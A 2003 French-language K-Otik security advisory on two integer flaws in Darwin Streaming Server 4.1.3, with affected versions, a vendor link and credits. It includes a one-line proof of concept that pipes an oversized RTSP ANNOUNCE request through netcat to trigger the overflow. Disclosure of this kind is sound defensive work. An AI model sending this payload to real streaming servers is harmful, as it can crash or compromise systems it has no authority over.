QuickTime-Darwin Streaming server Integer overflow

 Date de Publication: 2003-05-24
 Titre: QuickTime-Darwin Streaming server Integer overflow
 K-Otik ID : 0110
 Exploitable à distance : Non
 Exploitable en local : Oui
 

 

 * Description Technique - Exploit *
 
 Darwin Streaming Server (DSS) est un serveur permettant le streaming QuickTime et utilisant les protocoles RTP et RTSP. Deux failles de sécurité sont présente dans DSS. La première est de type integer overflow dans le module QTSSReflector (requête ANNOUNCE) :

 $ perl -e 'print "ANNOUNCE /.sdp
RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1] 554 (rtsp) open
too many output retries : Broken pipe
La seconde faille est de type Integer handling, elle est présente dans l'utilitaire MP3Broadcaster (dans ID3 tags).

  * Versions Vulnérables *

 Darwin Streaming Server version 4.1.3
  
  * Solution *

 http://developer.apple.com/darwin/projects/streaming/


  * Crédits *
 
Faille découverte par Sir Mordred (Mai 2003).

 

Audits de Sécurité & Tests Intrusifs F-VNS Security™ Mailing Listes Advisories Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits